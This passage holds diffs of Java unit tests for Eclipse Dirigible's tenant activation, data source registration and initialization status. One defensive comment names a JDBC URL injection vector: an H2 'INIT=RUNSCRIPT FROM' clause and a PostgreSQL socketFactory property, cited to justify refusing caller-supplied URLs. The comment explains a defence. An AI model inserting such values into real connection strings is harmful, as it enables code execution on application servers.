+        when(dataSourceRegistrationService.isRegistered(any())).thenReturn(false);
+        Tenant tenant = tenant(TenantStatus.PENDING_ACTIVATION);
+
+        ResponseStatusException ex = assertThrows(ResponseStatusException.class, () -> service.activate(tenant));
+
+        assertEquals(HttpStatus.BAD_REQUEST, ex.getStatusCode());
+        assertTrue(ex.getReason()
+                     .contains("acme_DefaultDB"),
+                ex.getReason());
+        assertEquals(TenantStatus.PENDING_ACTIVATION, tenant.getStatus());
+        verify(tenantService, never()).save(any());
+        verify(definitionService, never()).updateChecksums(any(), any());
+    }
+
+    /** Re-activating an active tenant is the documented way to repair a failed initialization. */
+    @Test
+    void reActivatingAnActiveTenantReInitializesIt() {
+        Tenant tenant = tenant(TenantStatus.PROVISIONED);
+
+        service.activate(tenant);
+
+        verify(tenantService, never()).save(any());
+        verify(definitionService).updateChecksums("", MULTITENANT_TYPES);
+        executor.runQueued();
+        verify(postProvisioningStep).execute();
+    }
+
+    /**
+     * A queued pass has not started yet, so it will cover the second tenant as well - running two
+     * global synchronizations back to back would only repeat the same work.
+     */
+    @Test
+    void activationsThatArriveTogetherShareOneInitialization() {
+        service.activate(tenant(TenantStatus.PENDING_ACTIVATION));
+        service.activate(tenant(TenantStatus.PENDING_ACTIVATION));
+
+        assertEquals(1, executor.queued(), "the second activation must not queue a second pass");
+        executor.runQueued();
+        verify(postProvisioningStep).execute();
+        // both activations still marked the work, which is what makes them individually observable
+        verify(definitionService, times(2)).updateChecksums("", MULTITENANT_TYPES);
+    }
+
+    /** An activation that arrives after the queued pass started gets a pass of its own. */
+    @Test
+    void anActivationAfterThePassStartedQueuesAnother() {
+        service.activate(tenant(TenantStatus.PENDING_ACTIVATION));
+        executor.runQueued();
+
+        service.activate(tenant(TenantStatus.PENDING_ACTIVATION));
+
+        assertEquals(1, executor.queued());
+        executor.runQueued();
+        verify(postProvisioningStep, times(2)).execute();
+    }
+
+    /** One failing step must not stop the others, and must not break the activation call. */
+    @Test
+    void aFailingStepDoesNotStopTheOthers() {
+        TenantPostProvisioningStep failing = mock(TenantPostProvisioningStep.class);
+        org.mockito.Mockito.doThrow(new IllegalStateException("boom"))
+                           .when(failing)
+                           .execute();
+        TenantActivationService withFailingStep = new TenantActivationService(tenantService, dataSourceRegistrationService,
+                definitionService, multitenantSynchronizers, Set.of(failing, postProvisioningStep), executor);
+
+        withFailingStep.activate(tenant(TenantStatus.PENDING_ACTIVATION));
+        executor.runQueued();
+
+        verify(postProvisioningStep).execute();
+    }
+
+    private static Tenant tenant(TenantStatus status) {
+        Tenant tenant = new Tenant("-", "Acme Ltd", "", "acme", status);
+        tenant.setId("acme");
+        return tenant;
+    }
+
+    /**
+     * An executor that holds what was submitted until the test says to run it - which is what lets the
+     * tests observe the state the caller of an activation sees, before the initialization starts.
+     */
+    private static final class DeferredExecutor extends AbstractExecutorService {
+
+        private final List<Runnable> pending = new ArrayList<>();
+
+        @Override
+        public void execute(Runnable command) {
+            pending.add(command);
+        }
+
+        int queued() {
+            return pending.size();
+        }
+
+        void runQueued() {
+            List<Runnable> toRun = new ArrayList<>(pending);
+            pending.clear();
+            toRun.forEach(Runnable::run);
+        }
+
+        @Override
+        public void shutdown() {}
+
+        @Override
+        public List<Runnable> shutdownNow() {
+            return List.of();
+        }
+
+        @Override
+        public boolean isShutdown() {
+            return false;
+        }
+
+        @Override
+        public boolean isTerminated() {
+            return false;
+        }
+
+        @Override
+        public boolean awaitTermination(long timeout, TimeUnit unit) {
+            return true;
+        }
+    }
+}

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationServiceTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationServiceTest.java
@@ -26,6 +26,7 @@ import java.util.List;
 import java.util.Optional;
 
 import org.eclipse.dirigible.components.data.sources.domain.DataSource;
+import org.eclipse.dirigible.components.data.sources.domain.DataSourceProperty;
 import org.eclipse.dirigible.components.data.sources.manager.DataSourceInitializer;
 import org.eclipse.dirigible.components.data.sources.manager.DataSourcesManager;
 import org.eclipse.dirigible.components.data.sources.manager.TenantDataSourceNameManager;
@@ -87,16 +88,31 @@ class TenantDataSourceRegistrationServiceTest {
         assertEquals("org.h2.Driver", saved.getDriver(), "the driver is inherited from the default data source");
     }
 
+    /**
+     * The URL, the driver and the connection properties are never a caller's to choose.
+     *
+     * <p>
+     * They are executable surface - an H2 URL can carry {@code INIT=RUNSCRIPT FROM '<url>'}, a
+     * PostgreSQL connection property can name a {@code socketFactory} class - so a request that could
+     * set them would turn "may register a tenant's credentials" into "may run code on the application
+     * server". They are not fields of the parameter at all; this pins that the definition takes them
+     * from the application's own data source and from nowhere else.
+     */
     @Test
-    void anExplicitUrlAndDriverOverrideTheDefaults() {
-        TenantDataSourceParameter parameter = parameter();
-        parameter.setUrl("jdbc:postgresql://db:5432/apps");
-        parameter.setDriver("org.postgresql.Driver");
+    void theUrlDriverAndPropertiesComeOnlyFromTheApplicationsOwnDataSource() {
+        service.register(tenant, parameter());
 
-        service.register(tenant, parameter);
-
-        assertEquals("jdbc:postgresql://db:5432/apps", savedDataSource().getUrl());
-        assertEquals("org.postgresql.Driver", savedDataSource().getDriver());
+        DataSource saved = savedDataSource();
+        assertEquals("jdbc:h2:mem:default", saved.getUrl());
+        assertEquals("org.h2.Driver", saved.getDriver());
+        assertEquals(1, saved.getProperties()
+                             .size());
+        assertEquals("ssl", saved.getProperties()
+                                 .get(0)
+                                 .getName());
+        assertEquals("false", saved.getProperties()
+                                   .get(0)
+                                   .getValue());
     }
 
     /** Re-registration replaces the definition in place - two rows would be two data sources. */
@@ -123,15 +139,21 @@ class TenantDataSourceRegistrationServiceTest {
         verify(dataSourceInitializer).removeInitializedDataSource(TENANT_DS);
     }
 
+    /**
+     * Saving a definition initializes its pool too, through a data source lifecycle listener, so a
+     * failure there is the same failure as a refused connection and has to reach the caller the same
+     * way. Before this was handled it surfaced as an unhandled 500 with no message.
+     */
     @Test
-    void connectivityIsNotVerifiedWhenTheCallerOptsOut() {
-        TenantDataSourceParameter parameter = parameter();
-        parameter.setVerifyConnectivity(false);
+    void aPoolFailureRaisedBySavingIsAlsoAnsweredAsBadGateway() {
+        when(dataSourceService.save(any())).thenThrow(new IllegalStateException("Failed to initialize pool: Wrong user name or password"));
 
-        service.register(tenant, parameter);
+        ResponseStatusException ex = assertThrows(ResponseStatusException.class, () -> service.register(tenant, parameter()));
 
-        verify(dataSourceInitializer, never()).initialize(any());
-        verify(dataSourceService).save(any());
+        assertEquals(HttpStatus.BAD_GATEWAY, ex.getStatusCode());
+        assertTrue(ex.getReason()
+                     .contains("Wrong user name or password"),
+                ex.getReason());
     }
 
     @Test
@@ -213,7 +235,10 @@ class TenantDataSourceRegistrationServiceTest {
 
     private static DataSource defaultDataSource() {
         DataSource dataSource = new DataSource("-", DEFAULT_DS, "", "org.h2.Driver", "jdbc:h2:mem:default", "sa", "");
-        dataSource.setProperties(List.of());
+        DataSourceProperty property = new DataSourceProperty();
+        property.setName("ssl");
+        property.setValue("false");
+        dataSource.setProperties(List.of(property));
         return dataSource;
     }
 

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationServiceTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationServiceTest.java
@@ -1,0 +1,205 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertSame;
+import static org.junit.jupiter.api.Assertions.assertThrows;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.List;
+import java.util.Optional;
+
+import org.eclipse.dirigible.components.data.sources.domain.DataSource;
+import org.eclipse.dirigible.components.data.sources.manager.DataSourceInitializer;
+import org.eclipse.dirigible.components.data.sources.manager.DataSourcesManager;
+import org.eclipse.dirigible.components.data.sources.manager.TenantDataSourceNameManager;
+import org.eclipse.dirigible.components.data.sources.service.DataSourceService;
+import org.eclipse.dirigible.components.database.DirigibleConnection;
+import org.eclipse.dirigible.components.database.DirigibleDataSource;
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.tenant.TenantFactory;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.mockito.ArgumentCaptor;
+import org.springframework.http.HttpStatus;
+import org.springframework.web.server.ResponseStatusException;
+
+/**
+ * The tenant's data source is a clone of the application's own with the tenant's credentials in it
+ * - and, above all, a re-registration must leave the running application using the credentials that
+ * were just sent, not the ones the pool was built with.
+ */
+class TenantDataSourceRegistrationServiceTest {
+
+    private static final String DEFAULT_DS = "DefaultDB";
+    private static final String TENANT_DS = "acme_DefaultDB";
+
+    private final DataSourcesManager dataSourcesManager = mock(DataSourcesManager.class);
+    private final DataSourceService dataSourceService = mock(DataSourceService.class);
+    private final DataSourceInitializer dataSourceInitializer = mock(DataSourceInitializer.class);
+    private final TenantDataSourceNameManager nameManager = mock(TenantDataSourceNameManager.class);
+
+    private final TenantDataSourceRegistrationService service = new TenantDataSourceRegistrationService(dataSourcesManager,
+            dataSourceService, dataSourceInitializer, nameManager, new TenantFactory(), DEFAULT_DS);
+
+    private final Tenant tenant = tenant();
+
+    @BeforeEach
+    void wireDefaults() throws SQLException {
+        when(nameManager.createName(any(), any())).thenReturn(TENANT_DS);
+        when(dataSourcesManager.getDataSourceDefinition(DEFAULT_DS)).thenReturn(defaultDataSource());
+        when(dataSourceService.findOptionalByName(TENANT_DS)).thenReturn(Optional.empty());
+        // built before the stubbing starts: the helper stubs mocks of its own, and Mockito cannot
+        // nest that inside an unfinished when(...)
+        DirigibleDataSource working = workingDataSource();
+        when(dataSourceInitializer.initialize(any())).thenReturn(working);
+    }
+
+    @Test
+    void aNewDataSourceClonesTheDefaultOneWithTheSuppliedCredentials() {
+        assertTrue(service.register(tenant, parameter()));
+
+        DataSource saved = savedDataSource();
+        assertEquals(TENANT_DS, saved.getName());
+        assertEquals("TENANT_DEFAULT", saved.getLocation());
+        assertEquals("TENANT_PROVISIONING_API", saved.getCreatedBy());
+        assertEquals("u_acme", saved.getUsername());
+        assertEquals("s3cret", saved.getPassword());
+        assertEquals("ACME", saved.getSchema());
+        assertEquals("jdbc:h2:mem:default", saved.getUrl(), "the URL is inherited from the default data source");
+        assertEquals("org.h2.Driver", saved.getDriver(), "the driver is inherited from the default data source");
+    }
+
+    @Test
+    void anExplicitUrlAndDriverOverrideTheDefaults() {
+        TenantDataSourceParameter parameter = parameter();
+        parameter.setUrl("jdbc:postgresql://db:5432/apps");
+        parameter.setDriver("org.postgresql.Driver");
+
+        service.register(tenant, parameter);
+
+        assertEquals("jdbc:postgresql://db:5432/apps", savedDataSource().getUrl());
+        assertEquals("org.postgresql.Driver", savedDataSource().getDriver());
+    }
+
+    /** Re-registration replaces the definition in place - two rows would be two data sources. */
+    @Test
+    void reRegistrationUpdatesTheExistingDefinition() {
+        DataSource existing = existingTenantDataSource();
+        when(dataSourceService.findOptionalByName(TENANT_DS)).thenReturn(Optional.of(existing));
+
+        assertFalse(service.register(tenant, parameter()), "an existing data source is updated, not created");
+
+        assertSame(existing, savedDataSource());
+        assertEquals("s3cret", existing.getPassword());
+    }
+
+    /**
+     * The reason the eviction is unconditional: an initialized pool keeps the password it was built
+     * with, and only removing it closes it. Without this, a rotated password would take effect at the
+     * next restart.
+     */
+    @Test
+    void theLivePoolIsAlwaysEvicted() {
+        service.register(tenant, parameter());
+
+        verify(dataSourceInitializer).removeInitializedDataSource(TENANT_DS);
+    }
+
+    @Test
+    void connectivityIsNotVerifiedWhenTheCallerOptsOut() {
+        TenantDataSourceParameter parameter = parameter();
+        parameter.setVerifyConnectivity(false);
+
+        service.register(tenant, parameter);
+
+        verify(dataSourceInitializer, never()).initialize(any());
+        verify(dataSourceService).save(any());
+    }
+
+    @Test
+    void credentialsThatDoNotWorkAreRefusedAndNothingIsStored() throws SQLException {
+        when(dataSourceInitializer.initialize(any())).thenThrow(new IllegalStateException("Wrong user name or password"));
+
+        ResponseStatusException ex = assertThrows(ResponseStatusException.class, () -> service.register(tenant, parameter()));
+
+        assertEquals(HttpStatus.BAD_GATEWAY, ex.getStatusCode());
+        assertTrue(ex.getReason()
+                     .contains("Wrong user name or password"),
+                "the database's own complaint has to reach the caller, got: " + ex.getReason());
+        verify(dataSourceService, never()).save(any());
+        // twice: once before the attempt, once to drop the pool the failed attempt may have left
+        verify(dataSourceInitializer, org.mockito.Mockito.times(2)).removeInitializedDataSource(TENANT_DS);
+    }
+
+    @Test
+    void aRegisteredDataSourceIsRecognizedAsThePreconditionOfAnActivation() {
+        when(dataSourceService.findOptionalByName(TENANT_DS)).thenReturn(Optional.of(existingTenantDataSource()));
+
+        assertTrue(service.isRegistered(tenant));
+    }
+
+    @Test
+    void anAbsentDataSourceIsRecognizedAsMissing() {
+        assertFalse(service.isRegistered(tenant));
+    }
+
+    private DataSource savedDataSource() {
+        ArgumentCaptor<DataSource> captor = ArgumentCaptor.forClass(DataSource.class);
+        verify(dataSourceService).save(captor.capture());
+        return captor.getValue();
+    }
+
+    private static TenantDataSourceParameter parameter() {
+        TenantDataSourceParameter parameter = new TenantDataSourceParameter();
+        parameter.setUsername("u_acme");
+        parameter.setPassword("s3cret");
+        parameter.setSchema("ACME");
+        return parameter;
+    }
+
+    private static DataSource defaultDataSource() {
+        DataSource dataSource = new DataSource("-", DEFAULT_DS, "", "org.h2.Driver", "jdbc:h2:mem:default", "sa", "");
+        dataSource.setProperties(List.of());
+        return dataSource;
+    }
+
+    private static DataSource existingTenantDataSource() {
+        return new DataSource("TENANT_DEFAULT", TENANT_DS, "", "org.h2.Driver", "jdbc:h2:mem:default", "u_acme", "old-password");
+    }
+
+    private static DirigibleDataSource workingDataSource() throws SQLException {
+        DirigibleDataSource dataSource = mock(DirigibleDataSource.class);
+        DirigibleConnection connection = mock(DirigibleConnection.class);
+        Statement statement = mock(Statement.class);
+        ResultSet resultSet = mock(ResultSet.class);
+        when(dataSource.getConnection()).thenReturn(connection);
+        when(connection.createStatement()).thenReturn(statement);
+        when(statement.executeQuery(any())).thenReturn(resultSet);
+        return dataSource;
+    }
+
+    private static Tenant tenant() {
+        Tenant tenant = new Tenant("-", "Acme Ltd", "", "acme", TenantStatus.PENDING_ACTIVATION);
+        tenant.setId("acme");
+        return tenant;
+    }
+}

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationServiceTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationServiceTest.java
@@ -15,14 +15,13 @@ import static org.junit.jupiter.api.Assertions.assertSame;
 import static org.junit.jupiter.api.Assertions.assertThrows;
 import static org.junit.jupiter.api.Assertions.assertTrue;
 import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.ArgumentMatchers.anyInt;
 import static org.mockito.Mockito.mock;
 import static org.mockito.Mockito.never;
 import static org.mockito.Mockito.verify;
 import static org.mockito.Mockito.when;
 
-import java.sql.ResultSet;
 import java.sql.SQLException;
-import java.sql.Statement;
 import java.util.List;
 import java.util.Optional;
 
@@ -69,7 +68,7 @@ class TenantDataSourceRegistrationServiceTest {
         when(dataSourceService.findOptionalByName(TENANT_DS)).thenReturn(Optional.empty());
         // built before the stubbing starts: the helper stubs mocks of its own, and Mockito cannot
         // nest that inside an unfinished when(...)
-        DirigibleDataSource working = workingDataSource();
+        DirigibleDataSource working = dataSourceReportingConnection(true);
         when(dataSourceInitializer.initialize(any())).thenReturn(working);
     }
 
@@ -162,6 +161,42 @@ class TenantDataSourceRegistrationServiceTest {
         assertFalse(service.isRegistered(tenant));
     }
 
+    /**
+     * The portability guarantee, stated as an assertion.
+     *
+     * <p>
+     * A hand-written {@code SELECT 1} here would look portable and would refuse working credentials on
+     * SAP HANA, which needs {@code SELECT 1 FROM DUMMY} - the reason {@code HanaDatabaseConfigurator}
+     * registers exactly that as the pool's test query - and on Derby, which needs a {@code FROM} clause
+     * of its own. The check must therefore ask the driver, never the SQL dialect, and this test fails
+     * the moment somebody issues a statement here again.
+     */
+    @Test
+    void connectivityIsCheckedWithoutIssuingAnySqlOfOurOwn() throws SQLException {
+        DirigibleConnection connection = mock(DirigibleConnection.class);
+        DirigibleDataSource dataSource = mock(DirigibleDataSource.class);
+        when(dataSource.getConnection()).thenReturn(connection);
+        when(connection.isValid(anyInt())).thenReturn(true);
+        when(dataSourceInitializer.initialize(any())).thenReturn(dataSource);
+
+        service.register(tenant, parameter());
+
+        verify(connection).isValid(anyInt());
+        verify(connection, never()).createStatement();
+        verify(connection, never()).prepareStatement(any());
+    }
+
+    @Test
+    void aConnectionTheDriverCallsUnusableIsRefusedAndNothingIsStored() throws SQLException {
+        DirigibleDataSource unusable = dataSourceReportingConnection(false);
+        when(dataSourceInitializer.initialize(any())).thenReturn(unusable);
+
+        ResponseStatusException ex = assertThrows(ResponseStatusException.class, () -> service.register(tenant, parameter()));
+
+        assertEquals(HttpStatus.BAD_GATEWAY, ex.getStatusCode());
+        verify(dataSourceService, never()).save(any());
+    }
+
     private DataSource savedDataSource() {
         ArgumentCaptor<DataSource> captor = ArgumentCaptor.forClass(DataSource.class);
         verify(dataSourceService).save(captor.capture());
@@ -186,14 +221,18 @@ class TenantDataSourceRegistrationServiceTest {
         return new DataSource("TENANT_DEFAULT", TENANT_DS, "", "org.h2.Driver", "jdbc:h2:mem:default", "u_acme", "old-password");
     }
 
-    private static DirigibleDataSource workingDataSource() throws SQLException {
+    /**
+     * A data source whose connection the driver reports as usable.
+     *
+     * @param usable what {@code isValid} answers
+     * @return the data source
+     * @throws SQLException never - the mocks declare it
+     */
+    private static DirigibleDataSource dataSourceReportingConnection(boolean usable) throws SQLException {
         DirigibleDataSource dataSource = mock(DirigibleDataSource.class);
         DirigibleConnection connection = mock(DirigibleConnection.class);
-        Statement statement = mock(Statement.class);
-        ResultSet resultSet = mock(ResultSet.class);
         when(dataSource.getConnection()).thenReturn(connection);
-        when(connection.createStatement()).thenReturn(statement);
-        when(statement.executeQuery(any())).thenReturn(resultSet);
+        when(connection.isValid(anyInt())).thenReturn(usable);
         return dataSource;
     }
 

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantIdsTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantIdsTest.java
@@ -1,0 +1,47 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.NullSource;
+import org.junit.jupiter.params.provider.ValueSource;
+
+/**
+ * The alphabet a tenant id may use. The dot is the interesting rejection: it is legal in a host
+ * name but would make the identity provider group {@code <tenantId>.<appId>.<role>} unparseable, so
+ * a tenant granted by such a group could never be entered.
+ */
+class TenantIdsTest {
+
+    @ParameterizedTest
+    @ValueSource(strings = {"acme", "globex", "a", "acme-corp", "a1", "1a", "tenant-1-2-3",
+            "abcdefghijabcdefghijabcdefghijabcdefghijabcdefghijabcdefghijabc"})
+    void validIds(String tenantId) {
+        assertTrue(TenantIds.isValid(tenantId), tenantId + " should be a valid tenant id");
+    }
+
+    @ParameterizedTest
+    @NullSource
+    @ValueSource(strings = {"", " ", "acme.corp", "codbex.library", "-acme", "acme-", "acme corp", "acme_corp", "acme/corp", "acme:corp",
+            "abcdefghijabcdefghijabcdefghijabcdefghijabcdefghijabcdefghijabcd"})
+    void invalidIds(String tenantId) {
+        assertFalse(TenantIds.isValid(tenantId), tenantId + " should be refused as a tenant id");
+    }
+
+    @Test
+    void theMessageNamesTheOffendingId() {
+        assertTrue(TenantIds.invalidMessage("acme.corp")
+                            .contains("acme.corp"));
+    }
+}

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantInitializationStatusCalculatorTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantInitializationStatusCalculatorTest.java
@@ -1,0 +1,234 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertNull;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.when;
+
+import java.util.List;
+import java.util.Set;
+
+import org.eclipse.dirigible.components.base.artefact.Artefact;
+import org.eclipse.dirigible.components.base.artefact.ArtefactLifecycle;
+import org.eclipse.dirigible.components.base.artefact.ArtefactService;
+import org.eclipse.dirigible.components.base.synchronizer.MultitenantSynchronizers;
+import org.eclipse.dirigible.components.base.synchronizer.Synchronizer;
+import org.eclipse.dirigible.components.initializers.definition.Definition;
+import org.eclipse.dirigible.components.initializers.definition.DefinitionService;
+import org.eclipse.dirigible.components.initializers.definition.DefinitionState;
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+
+/**
+ * The whole derivation matrix. Every case here is one a poller acts on, so getting any of them
+ * wrong either strands a provisioning process or lets it declare success over a tenant that has
+ * nothing in it.
+ */
+class TenantInitializationStatusCalculatorTest {
+
+    private static final Set<String> MULTITENANT_TYPES = Set.of("table", "csvim");
+
+    private final MultitenantSynchronizers multitenantSynchronizers = mock(MultitenantSynchronizers.class);
+    private final DefinitionService definitionService = mock(DefinitionService.class);
+    private final TenantInitializationStatusCalculator calculator =
+            new TenantInitializationStatusCalculator(multitenantSynchronizers, definitionService);
+
+    @BeforeEach
+    void wireDefaults() {
+        when(multitenantSynchronizers.getArtefactTypes()).thenReturn(MULTITENANT_TYPES);
+        when(multitenantSynchronizers.getSynchronizers()).thenReturn(List.of());
+        when(definitionService.findByTypes(any())).thenReturn(List.of());
+    }
+
+    /** Registered, maybe with a data source, but never activated. */
+    @Test
+    void aTenantThatWasNeverActivatedHasNotStarted() {
+        assertEquals(InitializationStatus.NOT_STARTED, calculate(TenantStatus.PENDING_ACTIVATION).status());
+    }
+
+    @Test
+    void aTenantOfTheBuiltInFlowThatIsNotProvisionedYetHasNotStarted() {
+        assertEquals(InitializationStatus.NOT_STARTED, calculate(TenantStatus.INITIAL).status());
+    }
+
+    /**
+     * The mark the activation leaves. Reading anything else here would let a poller skip the wait
+     * entirely and report a tenant ready before a single table of it existed.
+     */
+    @Test
+    void aBlankedDefinitionMeansTheWorkIsStillAhead() {
+        when(definitionService.findByTypes(any())).thenReturn(List.of(definition("table", "", DefinitionState.PARSED)));
+
+        assertEquals(InitializationStatus.IN_PROGRESS, calculate(TenantStatus.PROVISIONED).status());
+    }
+
+    @Test
+    void aDefinitionWithoutAnyChecksumMeansTheWorkIsStillAhead() {
+        when(definitionService.findByTypes(any())).thenReturn(List.of(definition("table", null, DefinitionState.NEW)));
+
+        assertEquals(InitializationStatus.IN_PROGRESS, calculate(TenantStatus.PROVISIONED).status());
+    }
+
+    @Test
+    void reprocessedDefinitionsMeanTheInitializationIsDone() {
+        when(definitionService.findByTypes(any())).thenReturn(
+                List.of(definition("table", "CHECKSUM", DefinitionState.PARSED), definition("csvim", "CHECKSUM", DefinitionState.PARSED)));
+
+        TenantInitializationState state = calculate(TenantStatus.PROVISIONED);
+
+        assertEquals(InitializationStatus.COMPLETED, state.status());
+        assertNull(state.error());
+    }
+
+    /**
+     * A definition whose source file is gone never gets its checksum back, so counting it as pending
+     * would leave every activation of the instance reporting progress forever.
+     */
+    @Test
+    void aDeletedDefinitionDoesNotHoldTheInitializationOpen() {
+        when(definitionService.findByTypes(any())).thenReturn(
+                List.of(definition("table", "", DefinitionState.DELETED), definition("csvim", "CHECKSUM", DefinitionState.PARSED)));
+
+        assertEquals(InitializationStatus.COMPLETED, calculate(TenantStatus.PROVISIONED).status());
+    }
+
+    @Test
+    void anInstanceWithNothingToMaterializeIsImmediatelyComplete() {
+        assertEquals(InitializationStatus.COMPLETED, calculate(TenantStatus.PROVISIONED).status());
+    }
+
+    @Test
+    void aDefinitionThatCannotBeParsedIsAFailure() {
+        Definition broken = definition("table", "CHECKSUM", DefinitionState.BROKEN);
+        broken.setMessage("Unexpected token at line 3");
+        when(definitionService.findByTypes(any())).thenReturn(List.of(broken));
+
+        TenantInitializationState state = calculate(TenantStatus.PROVISIONED);
+
+        assertEquals(InitializationStatus.FAILED, state.status());
+        assertTrue(state.error()
+                        .contains("Unexpected token at line 3"),
+                state.error());
+        assertTrue(state.error()
+                        .contains("/acme/customer.table"),
+                state.error());
+    }
+
+    /**
+     * The failure this API exists to report: the definition parsed, but materializing it into the
+     * tenant's schema - with the externally created credentials - did not work. It is recorded on the
+     * artefact, not on the definition, so watching definitions alone would call this a success.
+     */
+    @Test
+    void anArtefactThatCouldNotBeMaterializedIsAFailure() {
+        when(definitionService.findByTypes(any())).thenReturn(List.of(definition("table", "CHECKSUM", DefinitionState.PARSED)));
+        Synchronizer<?, ?> synchronizer = synchronizerReturning(
+                artefact("table", "/acme/customer.table", ArtefactLifecycle.FAILED, "Insufficient privilege to create table"));
+        when(multitenantSynchronizers.getSynchronizers()).thenReturn(List.of(synchronizer));
+
+        TenantInitializationState state = calculate(TenantStatus.PROVISIONED);
+
+        assertEquals(InitializationStatus.FAILED, state.status());
+        assertTrue(state.error()
+                        .contains("Insufficient privilege to create table"),
+                state.error());
+    }
+
+    @Test
+    void aFatalArtefactIsAFailureToo() {
+        Synchronizer<?, ?> synchronizer =
+                synchronizerReturning(artefact("table", "/acme/customer.table", ArtefactLifecycle.FATAL, "Dependency cycle"));
+        when(multitenantSynchronizers.getSynchronizers()).thenReturn(List.of(synchronizer));
+
+        assertEquals(InitializationStatus.FAILED, calculate(TenantStatus.PROVISIONED).status());
+    }
+
+    @Test
+    void aSuccessfullyCreatedArtefactIsNotAFailure() {
+        Synchronizer<?, ?> synchronizer = synchronizerReturning(artefact("table", "/acme/customer.table", ArtefactLifecycle.CREATED, null));
+        when(multitenantSynchronizers.getSynchronizers()).thenReturn(List.of(synchronizer));
+
+        assertEquals(InitializationStatus.COMPLETED, calculate(TenantStatus.PROVISIONED).status());
+    }
+
+    /** Work still ahead outranks failures already recorded - the pass may yet repair them. */
+    @Test
+    void pendingWorkOutranksAnAlreadyRecordedFailure() {
+        when(definitionService.findByTypes(any())).thenReturn(List.of(definition("table", "", DefinitionState.PARSED)));
+        Synchronizer<?, ?> synchronizer =
+                synchronizerReturning(artefact("table", "/acme/customer.table", ArtefactLifecycle.FAILED, "Insufficient privilege"));
+        when(multitenantSynchronizers.getSynchronizers()).thenReturn(List.of(synchronizer));
+
+        assertEquals(InitializationStatus.IN_PROGRESS, calculate(TenantStatus.PROVISIONED).status());
+    }
+
+    /** An artefact table that cannot be read is not an initialization failure of its own. */
+    @Test
+    void anUnreadableArtefactTypeIsSkipped() {
+        Synchronizer<?, ?> broken = mock(Synchronizer.class);
+        ArtefactService<?, ?> service = mock(ArtefactService.class);
+        when(service.getAll()).thenThrow(new IllegalStateException("Table DIRIGIBLE_TABLES does not exist"));
+        doReturnService(broken, service);
+        when(multitenantSynchronizers.getSynchronizers()).thenReturn(List.of(broken));
+
+        assertEquals(InitializationStatus.COMPLETED, calculate(TenantStatus.PROVISIONED).status());
+    }
+
+    private TenantInitializationState calculate(TenantStatus status) {
+        Tenant tenant = new Tenant("-", "Acme Ltd", "", "acme", status);
+        tenant.setId("acme");
+        return calculator.calculate(tenant);
+    }
+
+    private static Definition definition(String type, String checksum, DefinitionState state) {
+        Definition definition = new Definition("/acme/customer." + type, "customer", type, new byte[0]);
+        definition.setChecksum(checksum);
+        definition.setState(state);
+        return definition;
+    }
+
